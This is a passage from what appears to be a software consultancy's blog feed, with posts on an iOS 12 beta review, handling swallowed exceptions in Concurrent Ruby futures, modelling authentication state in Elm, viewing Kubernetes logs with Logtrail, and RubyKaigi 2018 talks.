improve something that you can't measure.
Screen Time is a feature that's going to be very useful for everyone who wants to cut down time on social apps or overall phone usage. It shows you every little detail of which apps you use, for how much time, and at what times. Not only this, it also keeps track of how many times you picked up your phone, and how many notifications you receive from the apps you have on your phone.</p><p><img src="/blog_images/2018/ios-12/ios-12-screen-time.png" alt="Screen Time in iOS 12"></p><p>Another useful sub-feature of Screen Time is App Limits, which allows you to set a limit on app usage by app or category. So let's say you don't want to use WhatsApp for more than 30 mins a day; you can do that through App Limits. It works for app categories including Games, Social Networking, Entertainment, Creativity, Productivity, Education, Reading &amp; Reference, and Health &amp; Fitness. So you can limit by category, which works across apps. Plus, it syncs across your other iOS devices, so you can't cheat that way.</p><h3>Siri and Shortcuts app</h3><p>&lt;section style=&quot;float: right; max-width: 250px; margin-left: 30px;&quot;&gt;&lt;img src='/blog_images/ios-12-thoughts/ios-12-siri-shortcuts.png' alt='Siri Shortcuts in iOS 12'&gt;&lt;/section&gt;</p><p>In iOS 12, you can assign custom shortcuts to Siri to trigger specific actions, which works not only with system apps but also with third-party apps. So now if you want to send a specific message to someone on WhatsApp, you can assign a command for that to Siri and trigger that action just by saying that command.</p><p>Apple has also introduced a new app in iOS 12 called Shortcuts. The Shortcuts app lets you group actions and run those actions quickly.
Although the Shortcuts app isn't there in iOS 12 beta 1, we think it's one of the best additions in iOS 12.</p><h3>Updated Photos app</h3><p>The Photos app now has a new section called &quot;For You&quot;, where it shows all the new albums, your best moments, share suggestions, and photo and effect suggestions. This is more like the Assistant tab of the Google Photos app. Also, you can share selected photos or albums with your friends right from the Photos app.</p><p>The Album tab in the Photos app is redesigned for easier navigation. There's also a new Search tab, which is more advanced, so you can now search photos using tags like &quot;surfing&quot; and &quot;vacation&quot;.</p><p>It's good to see Apple paying attention to the Photos app, but we still think Google Photos is the better option for the average person, considering it lets you store photos in the cloud for free. Also, photo organization in Google Photos is much better than in the new Photos app in iOS 12.</p><h3>Enhanced Do Not Disturb Mode</h3><p>Do Not Disturb in iOS 12 is enhanced to be more flexible. You can now set Do Not Disturb mode to end automatically in an hour, or at night, or according to your Calendar events, or even based on your location.</p><p>Not just that, Do Not Disturb has a new <em>Bedtime mode</em>, enabling which will silence all your notifications during bedtime and dim your display. And when you wake up, it'll show you a welcome back message along with weather details on the lock screen.</p><h3>Conclusion</h3><p>There are other updates and under-the-hood improvements as well, like the <em>new Measure app, redesigned iBooks app, tracking prevention, group FaceTime</em> etc. Overall, we think it's an okay update, with fewer bugs than you might expect from a first beta. The force touch on the keyboard to drag the cursor doesn't work, and Skype and some other apps crash, but for the most part, it's good enough to be installed on your primary device.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Concurrent Ruby in a Ruby on Rails Application]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/using-concurrent-ruby-in-a-ruby-on-rails-application"/>
      <updated>2018-06-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-concurrent-ruby-in-a-ruby-on-rails-application</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/ruby-concurrency/concurrent-ruby">Concurrent Ruby</a> is a concurrency toolkit that builds on a lot of interesting ideas from many functional languages and classic concurrency patterns. When it comes to writing threaded code in Rails applications, look no further, since concurrent-ruby is <a href="https://github.com/rails/rails/blob/565ce0eaba233fcdd196c11715a8740bd571fd31/activesupport/activesupport.gemspec#L33">already included in Rails</a> via Active Support.</p><h3>Using Concurrent::Future</h3><p>In one of our applications, to improve performance, we added threaded code using <a href="https://github.com/ruby-concurrency/concurrent-ruby">Concurrent::Future</a>. It worked really well for us until one day it stopped working.</p><p>&quot;Why threads?&quot; one might ask. The code in question was a textbook threading use case. It had a few API calls, some DB requests and finally an action that was performed on all the data that was aggregated.</p><p>Let us look at what this code looks like.</p><h4>Non threaded code</h4><pre><code class="language-ruby">selected_shipping_companies.each do | carrier |
  # api calls
  distance_in_miles = find_distance_from_origin_to_destination
  historical_average_rate = historical_average_for_this_particular_carrier

  # action performed
  build_price_details_for_this_carrier(distance_in_miles,
                                       historical_average_rate)
end</code></pre><p>Converting the above code to use Concurrent::Future is trivial.</p><pre><code class="language-ruby">futures = selected_shipping_companies.map do |carrier|
  Concurrent::Future.execute do
    # api calls
    distance_in_miles = find_distance_from_origin_to_destination
    historical_average_rate = historical_average_for_this_particular_carrier

    # action performed
    build_price_details_for_this_carrier(distance_in_miles,
                                         historical_average_rate)
  end
end

futures.map(&amp;:value)</code></pre><h3>A bit more about Concurrent::Future</h3><p>It is often intimidating to work with threads. They can bring in complexity and can have unpredictable behaviors due to lack of thread-safety. Since Ruby is a language of mutable references, we often find it difficult to write 100% thread-safe code.</p><p>Inspired by <a href="https://clojuredocs.org/clojure.core/future">Clojure's future function</a>, Concurrent::Future is a primitive that guarantees thread safety. It takes a block of work and performs the work asynchronously using Concurrent Ruby's global thread pool. Once a block of work is scheduled, Concurrent Ruby gives us a handle to this future work; when <code>#value</code> (or <code>#deref</code>) is called on it, the block's value is returned.</p><h3>The Bug</h3><p>Usually, when an exception occurs in the main thread, the interpreter stops and gathers the exception data. In the case of Ruby threads, any unhandled exceptions are reported only when <a href="https://ruby-doc.org/core-2.2.0/Thread.html#method-i-join">Thread#join</a> is called. Setting <code>Thread#abort_on_exception</code> to <code>true</code> is a better alternative, which will cause all threads to exit when an exception is raised in any running thread. We <a href="https://blog.bigbinary.com/2018/04/18/ruby-2-5-enables-thread-report_on_exception-by-default.html">published a blog</a> recently which talks about this in great detail.</p><h4>Exception handling in Concurrent Ruby</h4><pre><code class="language-ruby">future = Concurrent::Future.execute {
  raise StandardError.new(&quot;Boom!&quot;)
}

sleep(0.1) # giving arbitrary time for future to execute

future.value     #=&gt; nil</code></pre><p>Where did the exception go? This code fails silently and swallows the exceptions.
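</p><p>The same silent failure can be reproduced with plain standard-library threads (a minimal stdlib-only sketch, added here for illustration and not part of the original post): an exception raised inside a thread stays hidden until <code>Thread#join</code> is called.</p>

```ruby
# Keep Ruby (>= 2.5) from printing the unhandled exception to stderr,
# so the silent failure is easier to observe.
Thread.report_on_exception = false

t = Thread.new { raise StandardError, "Boom!" }
sleep(0.1) # give the thread time to die

t.alive? # => false; the thread is already dead, yet nothing was raised here

# Only joining the thread re-raises the exception in the main thread.
begin
  t.join
rescue StandardError => e
  puts e.message # prints "Boom!"
end
```

<p>Concurrent::Future behaves analogously: the exception stays captured inside the future until we explicitly ask for it. 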
How can we find out if the code executed successfully?</p><pre><code class="language-ruby">future = Concurrent::Future.execute {
  raise StandardError.new(&quot;Boom!&quot;)
}

sleep(0.1) # giving arbitrary time for future to execute

future.value     #=&gt; nil
future.rejected? #=&gt; true
future.reason    #=&gt; &quot;#&lt;StandardError: Boom!&gt;&quot;</code></pre><h3>How we fixed our issue</h3><p>We found places in our application where Concurrent::Future was used in a way that would swallow exceptions. It is also possible that people might overlook the explicit need to manually check for exceptions. We addressed these concerns with the following wrapper class.</p><pre><code class="language-ruby">module ConcurrentExecutor
  class Error &lt; StandardError
    def initialize(exceptions)
      @exceptions = exceptions
      super
    end

    def message
      @exceptions.map { | e | e.message }.join &quot;\n&quot;
    end

    def backtrace
      traces = @exceptions.map { |e| e.backtrace }
      [&quot;ConcurrentExecutor::Error START&quot;, traces, &quot;END&quot;].flatten
    end
  end

  class Future
    def initialize(pool: nil)
      @pool = pool || Concurrent::FixedThreadPool.new(20)
      @exceptions = Concurrent::Array.new
    end

    # Sample Usage
    # executor = ConcurrentExecutor::Future.new(pool: pool)
    # executor.execute(carriers) do | carrier |
    #   ...
    # end
    #
    # values = executor.resolve
    def execute array, &amp;block
      @futures = array.map do | element |
        Concurrent::Future.execute({ executor: @pool }) do
          yield(element)
        end.rescue do | exception |
          @exceptions &lt;&lt; exception
        end
      end

      self
    end

    def resolve
      values = @futures.map(&amp;:value)

      if @exceptions.length &gt; 0
        raise ConcurrentExecutor::Error.new(@exceptions)
      end

      values
    end
  end
end</code></pre><p>Please note that using Concurrent Ruby futures caused a segmentation fault while running specs in CircleCI. As of this writing, we are using normal looping instead of futures in CircleCI until the reason for the segfault is isolated and fixed.</p><h3>Update</h3><p>Concurrent::Future also gives us another API which not only returns the value of the block but also raises any exceptions that occur into the main thread.</p><pre><code class="language-ruby">thread_pool = Concurrent::FixedThreadPool.new(20)

executors = [1, 2, 3, 4].map do |random_number|
  Concurrent::Future.execute({ executor: thread_pool }) do
    random_number / (random_number.even? ? 0 : 1)
  end
end

executors.map(&amp;:value)
=&gt; [1, nil, 3, nil]

executors.map(&amp;:value!)
&gt; ZeroDivisionError: divided by 0
&gt; from (pry):4:in `/'</code></pre><p>We thank <a href="https://github.com/jrochkind">Jonathan Rochkind</a> for pointing us to this undocumented API <a href="https://www.reddit.com/r/ruby/comments/8pedmm/using_concurrent_ruby_in_a_ruby_on_rails/">in his reddit post</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Modelling state in Elm to reflect business logic]]></title>
       <author><name>Ritesh Pillai</name></author>
      <link href="https://www.bigbinary.com/blog/modelling-state-in-elm-to-reflect-business-logic"/>
      <updated>2018-06-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/modelling-state-in-elm-to-reflect-business-logic</id>
      <content type="html"><![CDATA[<p>We recently made <a href="https://blog.bigbinary.com/2018/05/25/apisnapshot-built-using-elm-and-ruby-on-rails-is-open-source.html">ApiSnapshot open source</a>. As mentioned in that blog, we ported the code from React.js to Elm.</p><p>One of the features of <code>ApiSnapshot</code> is support for <code>Basic Authentication</code>.</p><p><img src="/blog_images/2018/modelling-state-in-elm-to-reflect-business-logic/apisnapshot-with-basic-authentication.png" alt="ApiSnapshot with basic authentication"></p><p>While we were rebuilding the whole application in Elm, we had to port the &quot;Add Basic Authentication&quot; feature. This feature can be accessed from the &quot;More&quot; drop-down on the right-hand side of the app, and it lets the user add a username and password to the request.</p><p>Let's see how the <code>Model</code> of our Elm app looks.</p><pre><code class="language-elm">type alias Model =
    { request : Request.MainRequest.Model
    , response : Response.MainResponse.Model
    , route : Route
    }</code></pre><p>Here is the Model in the <em>Request.MainRequest</em> module.</p><pre><code class="language-elm">type alias APISnapshotRequest =
    { url : String
    , httpMethod : HttpMethod
    , requestParameters : RequestParameters
    , requestHeaders : RequestHeaders
    , username : Maybe String
    , password : Maybe String
    , requestBody : Maybe RequestBody
    }


type alias Model =
    { request : APISnapshotRequest
    , showErrors : Bool
    }</code></pre><p>The <code>username</code> and <code>password</code> fields are optional for the users, so we kept them as <code>Maybe</code> types.</p><p>Note that the API always responds with <code>username</code> and <code>password</code>, whether the user clicked to add <code>Basic Authentication</code> or not.
The API would respond with a <strong><em>null</em></strong> for both username and password when a user retrieves a snapshot for which the user did not fill in <code>username</code> and <code>password</code>.</p><p>Here is a sample API response.</p><pre><code class="language-json">{
  &quot;url&quot;: &quot;http://dog.ceo/api/breed/affenpinscher/images/random&quot;,
  &quot;httpMethod&quot;: &quot;GET&quot;,
  &quot;requestParams&quot;: {},
  &quot;requestHeaders&quot;: {},
  &quot;requestBody&quot;: null,
  &quot;username&quot;: &quot;alanturning&quot;,
  &quot;password&quot;: &quot;welcome&quot;,
  &quot;assertions&quot;: [],
  &quot;response&quot;: {
    &quot;response_headers&quot;: {
      &quot;age&quot;: &quot;0&quot;,
      &quot;via&quot;: &quot;1.1 varnish (Varnish/6.0), 1.1 varnish (Varnish/6.0)&quot;,
      &quot;date&quot;: &quot;Thu, 03 May 2018 09:43:11 GMT&quot;,
      &quot;vary&quot;: &quot;&quot;,
      &quot;cf_ray&quot;: &quot;4151c826ac834704-EWR&quot;,
      &quot;server&quot;: &quot;cloudflare&quot;
    },
    &quot;response_body&quot;: &quot;{\&quot;status\&quot;:\&quot;success\&quot;,\&quot;message\&quot;:\&quot;https:\\/\\/images.dog.ceo\\/breeds\\/affenpinscher\\/n02110627_13221.jpg\&quot;}&quot;,
    &quot;response_code&quot;: &quot;200&quot;
  }
}</code></pre><p>Let's look at the view code which renders the data received from the API.</p><pre><code class="language-elm">view : ( Maybe String, Maybe String ) -&gt; Html Msg
view usernameAndPassword =
    case usernameAndPassword of
        ( Nothing, Nothing ) -&gt;
            text &quot;&quot;

        ( Just username, Nothing ) -&gt;
            basicAuthenticationView username &quot;&quot;

        ( Nothing, Just password ) -&gt;
            basicAuthenticationView &quot;&quot; password

        ( Just username, Just password ) -&gt;
            basicAuthenticationView username password


basicAuthenticationView : String -&gt; String -&gt; Html Msg
basicAuthenticationView username password =
    [ div [ class &quot;form-row&quot; ]
        [ input
            [ type_ &quot;text&quot;
            , placeholder &quot;Username&quot;
            , value username
            , onInput (UpdateUsername)
            ]
            []
        , input
            [ type_ &quot;password&quot;
            , placeholder &quot;Password&quot;
            , value password
            , onInput (UpdatePassword)
            ]
            []
        , a
            [ href &quot;javascript:void(0)&quot;
            , onClick (RemoveBasicAuthentication)
            ]
            [ text &quot;&quot; ]
        ]
    ]</code></pre><p>To get the desired view, we apply the following rules.</p><ol><li>Check if both the values are strings.</li><li>Check if either of the values is a string.</li><li>Assume that both the values are <code>null</code>.</li></ol><p>This works, but we can do a better job of modelling it.</p><p>What's happening here is that we were trying to translate our API responses directly to the Model. Let's try to club username and password together into a new type called <em>BasicAuthentication</em>.</p><p>In the model, add a parameter called <em>basicAuthentication</em> which would be of type <code>Maybe BasicAuthentication</code>. This way, if the user has opted to use the basic authentication fields, then it is a <em>Just BasicAuthentication</em> and we can show the input boxes.
Otherwise it is <em>Nothing</em> and we show nothing!</p><p>Here is what the updated Model for <em>Request.MainRequest</em> would look like.</p><pre><code class="language-elm">type alias BasicAuthentication =
    { username : String
    , password : String
    }


type alias APISnapshotRequest =
    { url : String
    , httpMethod : HttpMethod
    , requestParameters : RequestParameters
    , requestHeaders : RequestHeaders
    , basicAuthentication : Maybe BasicAuthentication
    , requestBody : Maybe RequestBody
    }


type alias Model =
    { request : APISnapshotRequest
    , showErrors : Bool
    }</code></pre><p>The Elm compiler will now complain that we need to change the JSON decoding for the <em>APISnapshotRequest</em> type because of this change.</p><p>Before we fix that, let's take a look at how JSON decoding is currently being done.</p><pre><code class="language-elm">import Json.Decode as JD
import Json.Decode.Pipeline as JP


decodeAPISnapshotRequest : Response -&gt; APISnapshotRequest
decodeAPISnapshotRequest hitResponse =
    let
        result =
            JD.decodeString requestDecoder hitResponse.body
    in
        case result of
            Ok decodedValue -&gt;
                decodedValue

            Err err -&gt;
                emptyRequest


requestDecoder : JD.Decoder APISnapshotRequest
requestDecoder =
    JP.decode Request
        |&gt; JP.optional &quot;username&quot; (JD.map Just JD.string) Nothing
        |&gt; JP.optional &quot;password&quot; (JD.map Just JD.string) Nothing</code></pre><p>Now we need to derive the state of the application from our API response.</p><p>Let's introduce a type called <em>ReceivedAPISnapshotRequest</em>, which would be the shape of our old <em>APISnapshotRequest</em> with no <em>basicAuthentication</em> field.
And let's update our <em>requestDecoder</em> function to return a Decoder of type <em>ReceivedAPISnapshotRequest</em> instead of <em>APISnapshotRequest</em>.</p><pre><code class="language-elm">type alias ReceivedAPISnapshotRequest =
    { url : String
    , httpMethod : HttpMethod
    , requestParameters : RequestParameters
    , requestHeaders : RequestHeaders
    , username : Maybe String
    , password : Maybe String
    , requestBody : Maybe RequestBody
    }


requestDecoder : JD.Decoder ReceivedAPISnapshotRequest</code></pre><p>We now need to move our earlier logic, which checks whether a user has opted to use the basic authentication fields, from the view function to the <em>decodeAPISnapshotRequest</em> function.</p><pre><code class="language-elm">decodeAPISnapshotRequest : Response -&gt; APISnapshotRequest
decodeAPISnapshotRequest hitResponse =
    let
        result =
            JD.decodeString requestDecoder hitResponse.body
    in
        case result of
            Ok value -&gt;
                let
                    extractedCreds =
                        ( value.username, value.password )

                    derivedBasicAuthentication =
                        case extractedCreds of
                            ( Nothing, Nothing ) -&gt;
                                Nothing

                            ( Just receivedUsername, Nothing ) -&gt;
                                Just { username = receivedUsername, password = &quot;&quot; }

                            ( Nothing, Just receivedPassword ) -&gt;
                                Just { username = &quot;&quot;, password = receivedPassword }

                            ( Just receivedUsername, Just receivedPassword ) -&gt;
                                Just { username = receivedUsername, password = receivedPassword }
                in
                    { url = value.url
                    , httpMethod = value.httpMethod
                    , requestParameters = value.requestParameters
                    , requestHeaders = value.requestHeaders
                    , basicAuthentication = derivedBasicAuthentication
                    , requestBody =
value.requestBody
                    }

            Err err -&gt;
                emptyRequest</code></pre><p>We extract the username and password into <em>extractedCreds</em> as a pair from <em>ReceivedAPISnapshotRequest</em> after decoding, and construct our <em>APISnapshotRequest</em> from it.</p><p>And now we have a clean view function which just takes a <em>BasicAuthentication</em> type and returns a <em>Html Msg</em> type.</p><pre><code class="language-elm">view : BasicAuthentication -&gt; Html Msg
view b =
    [ div [ class &quot;form-row&quot; ]
        [ input
            [ type_ &quot;text&quot;
            , placeholder &quot;Username&quot;
            , value b.username
            , onInput (UpdateUsername)
            ]
            []
        , input
            [ type_ &quot;password&quot;
            , placeholder &quot;Password&quot;
            , value b.password
            , onInput (UpdatePassword)
            ]
            []
        , a
            [ href &quot;javascript:void(0)&quot;
            , onClick (RemoveBasicAuthentication)
            ]
            [ text &quot;&quot; ]
        ]
    ]</code></pre><p>We now have a Model that better captures the business logic. And should we change the logic of basic authentication parameter selection in the future, we do not have to worry about updating the logic in the view.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Logtrail to tail log with Elasticsearch & Kibana on Kubernetes]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/tail-log-using-logtrail-with-elk-on-kubernetes"/>
      <updated>2018-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tail-log-using-logtrail-with-elk-on-kubernetes</id>
      <content type="html"><![CDATA[<p>Monitoring and logging are important aspects of deployments. Centralized logging is always useful in helping us identify problems.</p><p>EFK (Elasticsearch, Fluentd, Kibana) is a beautiful combination of tools to store logs centrally and visualize them with a single click. There are many other open-source logging tools available in the market, but EFK (ELK if Logstash is used) is one of the most widely used centralized logging stacks.</p><p>This blog post shows how to integrate <a href="https://github.com/sivasamyk/logtrail">Logtrail</a>, which has a <a href="https://papertrailapp.com/">Papertrail</a>-like UI, to tail the logs. Using Logtrail we can also apply filters while tailing the logs centrally.</p><p>As EFK ships as an add-on with Kubernetes, all we have to do is deploy the EFK add-on on our k8s cluster.</p><h4>Pre-requisites:</h4><ul><li><p>Access to a working Kubernetes cluster with a <a href="https://kubernetes.io/docs/reference/kubectl/kubectl/">kubectl</a> configuration.</p></li><li><p>All our application logs should be redirected to STDOUT, so that Fluentd forwards them to Elasticsearch.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>, <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>, <a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>, <a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">daemonsets</a>, <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a> and <a href="https://kubernetes.io/docs/concepts/cluster-administration/addons/">addons</a>.</p></li></ul><p>Installing the EFK add-on from <a href="https://github.com/kubernetes/kops/tree/master/addons/logging-elasticsearch">kubernetes upstream</a> is simple.
Deploy EFK using the following command.</p><pre><code class="language-bash">$ kubectl create -f https://raw.githubusercontent.com/kubernetes/kops/master/addons/logging-elasticsearch/v1.6.0.yaml
serviceaccount &quot;elasticsearch-logging&quot; created
clusterrole &quot;elasticsearch-logging&quot; created
clusterrolebinding &quot;elasticsearch-logging&quot; created
serviceaccount &quot;fluentd-es&quot; created
clusterrole &quot;fluentd-es&quot; created
clusterrolebinding &quot;fluentd-es&quot; created
daemonset &quot;fluentd-es&quot; created
service &quot;elasticsearch-logging&quot; created
statefulset &quot;elasticsearch-logging&quot; created
deployment &quot;kibana-logging&quot; created
service &quot;kibana-logging&quot; created</code></pre><p>Once the k8s resources are created, access the Kibana dashboard. To access the dashboard, get the URL using <code>kubectl cluster-info</code>.</p><pre><code class="language-bash">$ kubectl cluster-info | grep Kibana
Kibana is running at https://api.k8s-test.com/api/v1/proxy/namespaces/kube-system/services/kibana-logging</code></pre><p>Now go to the Kibana dashboard and we should be able to see the logs.</p><p><img src="/blog_images/2018/tail-log-using-logtrail-with-elk-on-kubernetes/kibana_dashboard.png" alt="Kibana dashboard"></p><p>The screenshot above shows the Kibana UI. We can create metrics and graphs as per our requirements.</p><p>We also want to view logs in <code>tail</code> style. We will use <a href="https://github.com/sivasamyk/logtrail">logtrail</a> to view logs in tail format. For that, we need a Docker image with the Logtrail plugin pre-installed.</p><p><strong>Note:</strong> If the upstream Kibana version of the k8s EFK add-on is 4.x, use a Kibana 4.x image for installing the Logtrail plugin in your custom image.
If the add-on ships with Kibana version 5.x, make sure you pre-install Logtrail on a Kibana 5 image.</p><p>Check the Kibana version for the add-on <a href="https://github.com/kubernetes/kops/blob/master/addons/logging-elasticsearch/v1.6.0.yaml#L245">here</a>.</p><p>We will replace the default Kibana image with the <a href="https://hub.docker.com/r/rahulmahale/kubernetes-logtrail/">kubernetes-logtrail image</a>.</p><p>To replace the Docker image, update the Kibana deployment using the command below.</p><pre><code class="language-bash">$ kubectl -n kube-system set image deployment/kibana-logging kibana-logging=rahulmahale/kubernetes-logtrail:latest
deployment &quot;kibana-logging&quot; image updated</code></pre><p>Once the image is deployed, go to the Kibana dashboard and click on Logtrail as shown below.</p><p><img src="/blog_images/2018/tail-log-using-logtrail-with-elk-on-kubernetes/kibana-logtrail-menu.png" alt="Switch to logtrail"></p><p>After switching to Logtrail we will start seeing all the logs in real time, as shown below.</p><p><img src="/blog_images/2018/tail-log-using-logtrail-with-elk-on-kubernetes/logtrail.png" alt="Logs in Logtrail"></p><p>This centralized logging dashboard with Logtrail allows us to filter on several parameters.</p><p>For example, let's say we want to check all the logs for the namespace <code>myapp</code>. We can use the filter <code>kubernetes.namespace_name:&quot;myapp&quot;</code>. We can use the filter <code>kubernetes.container_name:&quot;mycontainer&quot;</code> to monitor logs for a specific container.</p>]]></content>
    </entry><entry>
       <title><![CDATA[RubyKaigi 2018 Day two]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rubykaigi-2018-day-two"/>
      <updated>2018-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rubykaigi-2018-day-two</id>
      <content type="html"><![CDATA[<p><a href="http://rubykaigi.org/2018">RubyKaigi</a> is happening at Sendai, Japan from 31stMay to 2nd June. It is perhaps the only conference where one can find almost allthe core Ruby team members in attendance.</p><p>This is <a href="https://twitter.com/_cha1tanya">Prathamesh</a>. I bring you live detailsabout what is happening at the Kaigi over the next two days. If you are at theconference please come and say &quot;Hi&quot; to me.</p><p>Check out<a href="https://blog.bigbinary.com/2018/05/31/rubykaigi-2018-day-one.html">what happened on day 1</a>.</p><h3>Faster Apps, No Memory Thrash: Get Your Memory Config Right by Noah Gibbs</h3><p><a href="https://twitter.com/codefolio">Noah</a> gave an awesome talk on techniques tomanage the memory used by Ruby applications. One of the main point while dealingwith GC is to make it run less, which means don't create too many objects. Healso mentioned that if application permits then destructive operations such as<code>gsub!</code> or <code>concat</code> should be used since they save CPU cycles and memory. Rubyallows setting up environment variables for managing the heap memory but it isreally hard to choose values for these environment variables blindly.</p><p>Noah has built a tool which uses <code>GC.stat</code> results from applications to estimatethe values of the memory related environment variables. Check out the<a href="https://github.com/noahgibbs/env_mem">EnvMem</a> gem.</p><p>In the end, he discussed some advanced debugging methods like checkingfragmentation percentage. 
The formula was prepared by <a href="https://twitter.com/nateberkopec/">Nate Berkopec</a>.</p><pre><code class="language-ruby">s = GC.stat
used_ratio = s[:heap_live_slots].to_f / (s[:heap_eden_pages] * 408)
fragmentation = 1 - used_ratio</code></pre><p>We can also use <code>GC::Profiler</code> to profile the code in real time to see how GC is behaving.</p><p>The benchmark used for this talk can be found <a href="https://github.com/noahgibbs/rails_ruby_bench">here</a>. Slides for this talk can be found <a href="https://docs.google.com/presentation/d/1-WrYwz-QnSI9yeRZfCCgUno-KOMuggiGHlmOETXZy9c/edit?usp=sharing">here</a>.</p><h3>Guild prototype</h3><p>Next I attended the talk by <a href="https://twitter.com/_ko1">Koichi Sasada</a> on the Guild prototype. He discussed the proposed design spec for Guilds, with a demo of a Fibonacci number program running 40 guilds on a 40-core CPU. One of the interesting observations is that performance drops as the number of guilds increases, because of the global locking.</p><p><img src="/blog_images/2018/rubykaigi-2018-day-two/guild.JPG" alt="Guild performance"></p><p>He discussed the concept of shareable and non-shareable objects. Shareable objects can be shared across multiple Guilds, whereas non-shareable objects can only be used by one Guild. This also means you can't write a thread-unsafe program with Guilds, &quot;by design&quot;. He discussed the challenges in specifying the shareable objects for Guilds.</p><p>Overall, there is still a lot of work left to be done for Guilds to become a part of Ruby.
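The fragmentation formula shown earlier can be tried as a small standalone Ruby sketch. This is illustrative only, not from the talk: the constant name and helper method are mine, and 408 is an approximation of the number of object slots per heap page in MRI, which varies across Ruby versions.

```ruby
# Sketch of the heap fragmentation estimate from Nate Berkopec's formula.
# SLOTS_PER_PAGE = 408 approximates object slots per heap page in MRI;
# the exact value depends on the Ruby version.
SLOTS_PER_PAGE = 408

def heap_fragmentation(stat = GC.stat)
  used_ratio = stat[:heap_live_slots].to_f / (stat[:heap_eden_pages] * SLOTS_PER_PAGE)
  1 - used_ratio
end

puts format("fragmentation: %.2f%%", heap_fragmentation * 100)
```

Numbers will vary by Ruby version and workload; the interesting signal is a fragmentation percentage that keeps growing over the life of a process.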
This includes defining protocols for shareable and non-shareable objects, making sure GC runs properly with Guilds, and synchronization between different Guilds.</p><p>The slides for this talk can be found <a href="http://www.atdot.net/~ko1/activities/2018_rubykaigi2018.pdf">here</a>.</p><h3>Ruby programming with type checking</h3><p><a href="https://twitter.com/soutaro">Soutaro</a> from SideCI gave a talk on <a href="https://github.com/soutaro/steep">Steep</a>, a gradual type checker for Ruby.</p><p>In the past, Matz has said that he doesn't like type definitions to be present in the Ruby code. Steep requires type definitions to be present in separate files with the extension <code>.rbi</code>. The Ruby source code needs a small amount of annotations. Steep also has a scaffold generator to generate basic type definitions for existing code.</p><p><img src="/blog_images/2018/rubykaigi-2018-day-two/steep.JPG" alt="Steep v/s Sorbet"></p><p>As of now, Steep runs slower than <a href="https://sorbet.run">Sorbet</a>, which was discussed yesterday by the Stripe team. Soutaro also discussed issues in type definitions due to metaprogramming in libraries such as Active Record. That looks like a challenge for Steep as of now.</p><h3>Web console</h3><p>After the tea break, I attended a talk by Genadi on how <a href="https://github.com/rails/web-console">web console</a> works.</p><p>He discussed the implementation of web-console in detail, with references to Ruby internals related to bindings. He compared the web-console interface with IRB and pry and explained the differences. As of now, web console has to monkey patch some of the Rails internals. Genadi has added support for <a href="https://github.com/rails/rails/pull/23868">registering interceptors</a>, which will prevent this monkey patching in Rails 6.
He is also mentoring a Google Summer of Code student working on the Actionable Errors project, where the user can take actions like running pending migrations from the webpage itself when the error is shown.</p><h3>Ruby committers v/s the World</h3><p><img src="/blog_images/2018/rubykaigi-2018-day-two/committers.JPG" alt="Ruby Committers v/s the World"></p><p>RubyKaigi offers this unique event where all the Ruby committers come on stage and face questions from the audience. This year the format was slightly different and it was run in the style of the Ruby core developer meeting. The <a href="https://docs.google.com/document/u/1/d/1Skh54Fq_nkpycZAS4_03tsafrtABDWxIx2-CKc-QIOY/pub">agenda</a> was decided beforehand, with some questions from the people and some tickets to discuss. The session started with a discussion of the <a href="https://www.ruby-lang.org/en/news/2018/05/31/ruby-2-6-0-preview2-released/">features coming up in Ruby 2.6</a>.</p><p>After that, the questions and the tickets in the agenda were discussed. It was good to see how the Ruby team takes decisions about features and suggestions.</p><p>Apart from this, there were <a href="http://rubykaigi.org/2018/schedule#jun01">talks on SciRuby, mRuby, linting, gem upgrades, C extensions and more</a> which I could not attend.</p><p>That's all for day two. Looking forward to day three already!</p><p>Oh, and here is the world map of all the attendees at RubyKaigi.</p><p><img src="/blog_images/2018/rubykaigi-2018-day-two/world.JPG" alt="World map of all attendees"></p>]]></content>
    </entry><entry>
       <title><![CDATA[RubyKaigi 2018 Day one]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rubykaigi-2018-day-one"/>
      <updated>2018-05-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rubykaigi-2018-day-one</id>
      <content type="html"><![CDATA[<p><a href="http://rubykaigi.org/2018">RubyKaigi</a> is happening at Sendai, Japan from 31st May to2nd June. It is perhaps the only conference where one can find almost allthe core Ruby team members in attendance.</p><p>This is <a href="https://twitter.com/_cha1tanya">Prathamesh</a>.I bring you live details about what is happeningat the Kaigi over the next three days.If you are at the conference please come and say &quot;Hi&quot; to me.</p><h3>Matz's keynote</h3><p>RubyKaigi started with Matz's keynote. He used lot of proverbs applyingthem to the Ruby language and software development.</p><p>He talked about one of the hardest problems in programming - naming with an example of<code>yield_self</code>.Matz added alias <code>then</code> to the <code>yield_self</code> method <a href="https://github.com/ruby/ruby/commit/d53ee008911b5c3b22cff1566a9ef7e7d4cbe183">yesterday</a>. He also discussed about <code>googlability</code> of the names.Ironically, Ruby was named in 1993 which was before Google had started.</p><p>Matz also touched upon<a href="https://www.ruby-lang.org/en/news/2018/02/24/ruby-2-6-0-preview1-released/">JIT option being introduced in Ruby 2.6</a>and guild as the ways the language continues to improve inperformance and concurrency.There is a talk on Guild by Koichi Sasada on second day of RubyKaigi whichwill have further details about it.</p><p>Matz ended the keynote talking about the need of maintaining backward compatibilityand not running into the situation like Ruby 1.9 or Python 3 where the compatibility was notmaintained. 
